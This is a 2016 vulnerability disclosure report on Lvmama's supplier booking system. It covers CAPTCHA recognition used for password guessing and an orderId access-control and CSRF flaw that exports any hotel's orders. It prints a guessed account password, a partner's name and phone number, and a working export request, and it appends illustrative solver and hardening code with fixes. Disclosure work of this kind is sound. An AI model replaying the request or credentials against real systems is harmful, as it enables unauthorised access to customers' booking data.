2016-05-02: Details sent to the vendor, awaiting vendor response
2016-05-03: Vendor confirmed; details disclosed to the vendor only
2016-05-13: Details disclosed to core white hats and domain experts
2016-05-23: Details disclosed to regular white hats
2016-06-02: Details disclosed to intern white hats
2016-06-17: Details disclosed to the public
Lvmama travel site: from CAPTCHA bypass to arbitrary hotel data export in a business system (still daring to book a room over the May Day holiday?)
Lvmama Supplier Management System (ebooking)
http://ebooking.lvmama.com/
#The CAPTCHA is machine-recognisable
Frankly, the CAPTCHA is far too easy to recognise. As in earlier cases, the images are too regular: no complexity, no interference or noise, no colour variation between glyphs and background. That gives a recognition rate of close to 99.9%, and that is no exaggeration: out of 20,000 fuzzing requests only a handful could not be recognised. The login form also returns distinct prompts such as "wrong password", so each guess gets a clear answer.
During testing, a response of length 7041 meant a valid account; the normal logged-in page came back:
HTTP/1.1 200 OK
Content-Language: zh-CN
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=UTF-8
Date: Sun, 01 May 2016 12:03:19 GMT
Server: nginx

2<!DOCTYPE html><html><head><meta charset="utf-8"><title>驴妈妈供应商管理系统_首页</title><link rel="shortcut icon" type="image/x-icon" href="http://www.lvmama.com/favicon.ico"><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="keywords" content="页面关键字"><meta name="description" content="页面描述"></head><body class="home"><script type="text/javascript" src="http://pic.lvmama.com/js/new_v/jquery-1.7.2.min.js"></script><script type="text/javascript" src="/vst_ebooking/js/lvmamajquery.js"></script><link href="http://pic.lvmama.com/min/index.php?f=/styles/v4/modules/calendar.css" type="text/css" rel="stylesheet"><link rel="stylesheet" href="http://pic.lvmama.com/min/index.php?f=/styles/v5/base.css,/styles/v5/common.css" ><link rel="stylesheet" href="http://pic.lvmama.com/min/index.php?f=/styles/v5/modules/dialog.css,/styles/v5/modules/table.css,/styles/v5/modules/arrow.css,/styles/v5/modules/form.css,/styles/v5/modules/button.css,/styles/v5/modules/paging.css,/styles/v5/modules/tip.css" ><!-- propage.css 项目页面样式 --><link rel="stylesheet" href="/vst_ebooking/css/base.css" ><link rel="stylesheet" href="/vst_ebooking/css/easyui.css" ><link rel="stylesheet" href="http://pic.lvmama.com/styles/v5/ebk.css"> <link rel="stylesheet" href="/vst_ebooking/css/contentManage/kindEditorConf.css" type="text/css"/> <script src="http://pic.lvmama.com/js/common/losc.js"></script><script src="http://pic.lvmama.com/js/common/losc.js"></script><script src="/vst_ebooking/js/My97DatePicker/WdatePicker.js"></script><script src="/vst_ebooking/js/notice.js"></script><!-- 公共头部开始 --><div class="header wrap clearfix"> <div style="display: none;" id="sessionUserName">zxy</div> <a class="logo">驴妈妈旅游网<span>ebooking测试用</span></a> <div class="adbox"></div> <div class="topinfo"> <p id="welcome">欢迎您,zxy <a 
href="/vst_ebooking/editPwd.do">修改密码</a> <i>|</i> <a href="/vst_ebooking/loginOut.do">退出</a></p> <p>合作方:zhouxinyuan 电话:15000480888</p> </div></div> <!--header end--><div class="enav wrap"> <ul class="enav-main clearfix"> <li class="nav-item" id="home"><a href="/vst_ebooking/index.do"><i class="icon icon-home"></i>首页</a></li> <li class="nav-item" id="route"><a href="/vst_ebooking/ebooking/prod/route/getRouteHome.do"><i class="icon icon-product"></i>度假线路</a></li> <li class="nav-item" id="ticket"><a href="/vst_ebooking/ebooking/ticket/pass/getTicketHome.do"><i class="icon icon-order"></i>门票</a></li> <li class="nav-item" id="hotel"><a href="/vst_ebooking/ebooking/prod/hotel/getHotelHome.do"><i class="icon icon-notice"></i>酒店</a></li> </ul> <div class="enav-nn"> <a href="/vst_ebooking/ebooking/announcement/announcementList.do">公告信息</a> <a href="/vst_ebooking/ebooking/user/findUserList.do">用户管理</a> <a id="smsConfig" href="/vst_ebooking/ebooking/sms/showSmsConfigList.do">短信提醒</a> <a href="/vst_ebooking/ebooking/advice/findEbkAdviceSubjectList.do">优化建议</a> <a href="/vst_ebooking/ebooking/manual/findEbkManualList.do">使用帮助</a> <a href="/vst_ebooking/ebooking/mobileversion/showMobileVersionPage.do">手机版</a> </div></div><!-- 公共头部结束 --><script>setInterval("autoRefreshService()",60000);function getNowFormatDate(date) { //var date = new Date(); var seperator1 = "-"; var seperator2 = ":"; var month = date.getMonth() + 1; var strDate = date.getDate(); if (month >= 1 && month <= 9) { month = "0" + month; } if (strDate >= 0 && strDate <= 9) { strDate = "0" + strDate; } var currentdate = date.getFullYear() + seperator1 + month + seperator1 + strDate + " " + date.getHours() + seperator2 + date.getMinutes() + seperator2 + date.getSeconds(); return new Date(currentdate);}function autoRefreshService(){ //如果cookie不为空并且与当前时间比大于20分钟 if(getCookie('ebkUser') != null && getNowFormatDate(new Date()).getTime()-new Date(getCookie('ebkUser')).getTime() > 1200000) { 
setCookie('ebkUser',getNowFormatDate(new Date())); $.ajax({ url : "/vst_ebooking/autoRefreshService.do?userName=zxy", type : "post", dataType:"JSON", data : $("#loginForm").serialize(), success : function(result) { } }); } else if(getCookie('ebkUser') == null) { setCookie('ebkUser',getNowFormatDate(new Date())); } };var forcedChangePwdDialog;$(function () { var $span = $("<span>"+ +"</span>"); var bShouldChangePwdFlag = $span.html(); if(!!bShouldChangePwdFlag) { forcedChangePwdDialog = new xDialog("/vst_ebooking/forcedToChangePwd.do",{}, {title:'修改密码',width:800, wrapClass:'forcedChangePwd'}); }});</script><div class="crumbs wrap"> <p class="crumbs-link"> <a href="#"><i class="icon icon-ihome"></i>首页</a> </p> <div class="index_remind">网页提醒:<span id="pageMessage" class="icon_guan"></span> 弹窗提醒:<span id="windowMessage" class="icon_guan"></span></div></div><!--//.crumbs--><div class="wrap"><!--侧边栏--><div class="aside"> <div class="nav-quick"> <h2>线路产品</h2> <ul class="clearfix"> <li> <span class="libg"></span> <i class="ui-arrow-right gray-ui-arrow-right"></i> <a href="/vst_ebooking/ebooking/prod/route/showSelectCategory.do">新增产品</a> </li> <li> <span class="libg"></span> <i class="ui-arrow-right gray-ui-arrow-right"></i> <a href="/vst_ebooking/ebooking/prod/route/audit/findProductAuditList.do?currentAuditStatus=noAuditStatus">产品管理</a> </li> <li> <span class="libg"></span> <i class="ui-arrow-right gray-ui-arrow-right"></i> <a href="/vst_ebooking/ebooking/route_certif/route/findComfirmRouteCertifOrderList.do?certifStatus=CREATE">订单处理</a> </li> <li> <span class="libg"></span> <i class="ui-arrow-right gray-ui-arrow-right"></i> <a href="/vst_ebooking/ebooking/prod/route/findProdOrdRouteList.do">数据管理</a> </li> </ul> <h2>门票产品</h2> <ul class="clearfix"> <li> <span class="libg"></span> <i class="ui-arrow-right gray-ui-arrow-right"></i> <a href="/vst_ebooking/ebooking/ticket/pass/findPassList.do">通关处理 </a> </li> <li> <span class="libg"></span> <i class="ui-arrow-right 
gray-ui-arrow-right"></i> <a href="/vst_ebooking/ebooking/ticket_certif/ticket/findComfirmTicketCertifOrderList.do?certifStatus=CREATE">订单处理 </a> </li> <li> <span class="libg"></span> <i class="ui-arrow-right gray-ui-arrow-right"></i> <a href="/vst_ebooking/ebooking/ticket/pass/findPassStatisList.do">数据管理 </a> </li> </ul> <h2>酒店产品</h2> <ul class="clearfix"> <li> <span class="libg"></span> <i class="ui-arrow-right gray-ui-arrow-right"></i> <a href="/vst_ebooking/ebooking/prod/hotel/findProductList.do">产品管理 </a> </li> <li> <span class="libg"></span> <i class="ui-arrow-right gray-ui-arrow-right"></i> <a href="/vst_ebooking/ebooking/super_task/hotel/findConfirmTaskList.do">订单处理 </a> </li> </ul> </div><!--//.nav-quick--></div><!--//.aside--> <div class="main"> <div class="main_box wrap"> <div class="hotel_info box_border"> <h3 class="box_title">待处理事项</h3> <ul class="hotel_info_box"> <li> <i class="icon_line"></i> <p>线路类</p> <a class="btn_dcl" href="/vst_ebooking/ebooking/route_certif/route/findComfirmRouteCertifOrderList.do?certifStatus=CREATE" target="_self">待处理订单<span>0</span>笔</a> </li> <li> <i class="icon_ticket"></i> <p>门票类</p> <a class="btn_dcl" href="/vst_ebooking/ebooking/ticket_certif/ticket/findComfirmTicketCertifOrderList.do?certifStatus=CREATE" target="_self">待处理订单<span>0</span>笔</a> </li> <li> <i class="icon_hotel"></i> <p>酒店类</p> <!-- 调中间表--> <a class="btn_dcl" href="/vst_ebooking/ebooking/order/hotel/findConfirmTaskList.do" target="_self">待处理订单<span>16</span>笔</a> </li> </ul> </div> <div class="gonggao_info box_border"> <h3 class="box_title"><a href="#">更多</a>公告</h3> <ul class="gonggao_list"> <li> <span>[2016-02-23]</span> <a href="/vst_ebooking/ebooking/announcement/announcementList.do;" onclick="ancHandler(201)">关于产品推荐上传图片卡死的问题,请大家设置页面显示为100%</a> </li> <li> <span>[2016-02-14]</span> <a href="/vst_ebooking/ebooking/announcement/announcementList.do;" onclick="ancHandler(181)">关于线路订单待处理任务的提醒(默认时间段为下单时间2个月内的订单)</a> </li> <li> <span>[2016-01-11]</span> <a 
href="/vst_ebooking/ebooking/announcement/announcementList.do;" onclick="ancHandler(161)">上线公告:线路行程录入结构化(含跟团游,当地游,自由行,机+酒)</a> </li> <li> <span>[2016-01-08]</span> <a href="/vst_ebooking/ebooking/announcement/announcementList.do;" onclick="ancHandler(141)">致歉:关于已开通短信帐号8点后未收到短信提醒</a> </li> <li> <span>[2016-01-07]</span> <a href="/vst_ebooking/ebooking/announcement/announcementList.do;" onclick="ancHandler(121)">短信订单短信提醒时间自定义上线公告</a> </li> </ul> </div> </div> </div></div><!-- 通用底部 --><div class="telephone_box wrap"> <ul class="telephone_list h_162"> <li> <h5>财务结算部</h5> <p>电话:021-60561632<br>传真:021-69108791<br> 021-69108795</p> </li> <li> <h5>酒店预订部</h5> <p>电 话:021-60561631<br> 021-60568957<br> 021-60568957<br> 客服传真:021-69108791<br>业务传真:021-69108795</p> </li> <li> <h5>系统服务</h5> <p>电话:021-60561616<br> 转:3412</p> </li> </ul> <a class="btn_show" href="javascript:void(0)" target="_self"><i></i></a></div><p class="footer">24小时旅游预订电话(免长话费):10106060 客服邮箱:[email protected]<br>Copyright©2014 www.lvmama.com 景域旅游运营集团版权所有 沪ICP备07509677</p><!-- jQuery以及通用js --><script src="/vst_ebooking/js/pandora-dialog.js"></script><script src="/vst_ebooking/js/pandora-calendar.js"></script><script src="/vst_ebooking/js/pandora-ebk-calendar.js"></script><script src="/vst_ebooking/js/jquery.validate.min.js"></script><script src="/vst_ebooking/js/vst_validate.js"></script><script src="/vst_ebooking/js/messages_zh.js"></script><script src="/vst_ebooking/js/notice.js"></script><script src="/vst_ebooking/js/jquery.easyui.min-1.3.1.js"></script><script src="/vst_ebooking/js/jquery.validate.expand.js"></script><script src="/vst_ebooking/js/jquery.jsonSuggest-2.min.js"></script><script src="/vst_ebooking/js/vst_pet_util.js"></script><script src="/vst_ebooking/js/vst_util.js"></script><!-- 页面项目js及插件 --><script src="/vst_ebooking/js/lineRouteEbk.js"></script><script src="/vst_ebooking/js/ebk.js"></script><script src="/vst_ebooking/js/lvmama-dialog.js"></script><script 
src="/vst_ebooking/js/json2.js"></script><script></script></body></html>
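The regularity described above (every glyph at a fixed position, no interference) is exactly what makes a CAPTCHA solvable by plain template matching, with no OCR at all. The script below is an added example, not code from the report or from Lvmama: it constructs a toy CAPTCHA from 3x5 ASCII glyphs, recognises it by cutting the image at fixed slot boundaries and exact-matching each slot, and then shows the same recogniser collapsing once each glyph gets a random horizontal shift and a few noise pixels. The glyph set, image size, code length and noise model are assumptions standing in for the real CAPTCHA, whose rendering is not shown on the page.

```python
import random

# Constructed 3x5 glyph templates for the digits 0-3 (assumption: a stand-in
# for the real CAPTCHA's font, which the report does not show).
GLYPHS = {
    "0": ["###", "#.#", "#.#", "#.#", "###"],
    "1": [".#.", "##.", ".#.", ".#.", "###"],
    "2": ["###", "..#", "###", "#..", "###"],
    "3": ["###", "..#", "###", "..#", "###"],
}
GLYPH_W, H, SLOT_W = 3, 5, 4  # 3 glyph columns plus one padding column per slot
CODE_LEN = 4


def render_regular(text, rng):
    """The weak generator: every glyph sits in a fixed slot, no noise, no
    distortion. rng is unused; the signature matches render_jittered."""
    return ["".join(GLYPHS[ch][r] + "." for ch in text) for r in range(H)]


def render_jittered(text, rng):
    """Same glyphs, but each one is shifted right by 0-2 columns and three
    random noise pixels are switched on (assumed interference model)."""
    width = SLOT_W * len(text) + 2
    grid = [["."] * width for _ in range(H)]
    for i, ch in enumerate(text):
        dx = rng.randint(0, 2)
        for r in range(H):
            for c, px in enumerate(GLYPHS[ch][r]):
                if px == "#":
                    grid[r][i * SLOT_W + dx + c] = "#"
    for _ in range(3):
        grid[rng.randrange(H)][rng.randrange(width)] = "#"
    return ["".join(row) for row in grid]


def recognise_fixed_slots(rows, n=CODE_LEN):
    """The attacker's recogniser: cut the image at fixed slot boundaries and
    exact-match each slot against the templates. Segmentation is free because
    the generator never moves a glyph."""
    out = ""
    for i in range(n):
        slot = [row[i * SLOT_W : i * SLOT_W + GLYPH_W] for row in rows]
        match = [ch for ch, g in GLYPHS.items() if g == slot]
        out += match[0] if match else "?"
    return out


def recognition_rate(renderer, trials=200, seed=1):
    """Fraction of randomly generated codes the recogniser gets exactly right."""
    rng = random.Random(seed)
    hits = 0
    for _ in range(trials):
        text = "".join(rng.choice("0123") for _ in range(CODE_LEN))
        hits += recognise_fixed_slots(renderer(text, rng)) == text
    return hits / trials


if __name__ == "__main__":
    print("regular  :", recognition_rate(render_regular))
    print("jittered :", recognition_rate(render_jittered))
```

The regular generator is recognised 100% of the time because each slot is byte-identical to a template; a per-glyph shift of even one column already breaks fixed-slot segmentation, which is the "complexity and interference" the fix recommendations ask for. Note that jitter and a few noise pixels only defeat this naive matcher; a tolerant matcher (nearest template by Hamming distance over a sliding window) would recover much of the rate, so the CAPTCHA fix on its own is not a substitute for rate limiting on the login form.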
This yielded several accounts; one with slightly higher privileges is used for the demonstration:
carrie 123456
#CSRF: order requests carry no token or similar validation, and earlier orders can be fully enumerated
The order is selected by the orderId parameter alone, with no check that it belongs to the logged-in supplier, for example:
orderId=25353960
Enumerating the latest orders, processed and unprocessed alike, is trivial. I also noticed a small detail (not sure whether anyone reported it before): exporting ticket or hotel data likewise has no token or session-bound protection.
POST /vst_ebooking/ebooking/order/hotel/getXLSForHotelTaskList.do HTTP/1.1
Host: ebooking.lvmama.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://ebooking.lvmama.com/vst_ebooking/ebooking/order/hotel/findAllTaskList.do
Content-Length: 142
Cookie: xxxxx
Connection: close

orderId=28536196&visitBeginTime=&visitEndTime=&certifStatus=&orderCreateBeginTime=&orderCreateEndTime=&confirmUser=&travellerName=&certifType=
Combining this with the order enumeration above, changing the orderId value in the export request is enough to export any hotel's order data. Taking this order number, a room booked just now, as the example: set the parameter to orderId=28536196 when exporting.
There are plenty more authorization bypasses and CSRF issues of the same kind; I will stop here.
1. Add session-bound token (CSRF token) validation to these requests.
2. Use a CAPTCHA with more complexity and stronger interference.
3. Enforce authorization when viewing or exporting orders: do not select the record directly from a client-supplied parameter such as orderId; resolve it through a server-side identifier tied to the caller's identity (this is the same point as 1).
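The enumeration and the export reduce to the same defect: the row is selected by a client-supplied orderId with no binding to the logged-in supplier and no request token. The following is an added example, not code from Lvmama's ebooking system: it models the vulnerable export handler beside a hardened one that checks a session-bound token and scopes the lookup to the caller's own supplier account, then runs the attacker's orderId walk against both. The order table, the supplier and hotel names and the Session class are constructed for the example; the real getXLSForHotelTaskList.do implementation is not on the page.

```python
import hmac
import secrets

# Constructed sample order table (assumption: supplier names, hotels and
# guests are made up; the two orderId values are the ones quoted above).
ORDERS = {
    25353960: {"supplier": "zxy", "hotel": "Hotel A", "guest": "Li"},
    28536196: {"supplier": "carrie", "hotel": "Hotel B", "guest": "Wang"},
    28536197: {"supplier": "carrie", "hotel": "Hotel C", "guest": "Zhao"},
}


class Forbidden(Exception):
    """Raised by the hardened handler for a bad token or a foreign order."""


class Session:
    """A logged-in supplier; the CSRF token is minted once per session."""

    def __init__(self, user):
        self.user = user
        self.csrf_token = secrets.token_hex(16)


def export_vulnerable(session, order_id):
    """Mirrors the report: orderId alone selects the row, so any logged-in
    supplier can export any other supplier's hotel order."""
    return ORDERS[order_id]


def export_hardened(session, order_id, csrf_token):
    # 1. A session-bound token rejects cross-site forged requests
    #    (constant-time compare so the token cannot be guessed byte by byte).
    if not hmac.compare_digest(session.csrf_token, csrf_token):
        raise Forbidden("bad csrf token")
    # 2. Scope the lookup to the caller: a missing order and someone else's
    #    order get the same answer, so the id space cannot be probed.
    row = ORDERS.get(order_id)
    if row is None or row["supplier"] != session.user:
        raise Forbidden("order not found")
    return row


def walk_order_ids(ids, fetch):
    """The attacker's loop: try each orderId and keep whatever comes back."""
    found = []
    for oid in ids:
        try:
            found.append((oid, fetch(oid)))
        except (KeyError, Forbidden):
            pass
    return found


def is_forbidden(fn):
    """True if calling fn() raises Forbidden (helper for the checks below)."""
    try:
        fn()
    except Forbidden:
        return True
    return False


if __name__ == "__main__":
    zxy = Session("zxy")
    ids = range(28536190, 28536200)
    print("vulnerable:", walk_order_ids(ids, lambda o: export_vulnerable(zxy, o)))
    print("hardened  :", walk_order_ids(ids, lambda o: export_hardened(zxy, o, zxy.csrf_token)))
```

Logged in as zxy, the vulnerable handler hands back carrie's two orders as soon as the walk reaches their ids; the hardened handler returns nothing for the same walk, and returns the same Forbidden for an id that does not exist and for one that belongs to another supplier, so response differences cannot be used as an oracle. The token check and the ownership check are independent: the token alone would still let a logged-in supplier export other suppliers' orders, which is why recommendation 3 matters even after 1 is done.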
Severity: High
Vulnerability Rank: 15
Confirmed: 2016-05-03 09:35
thx
None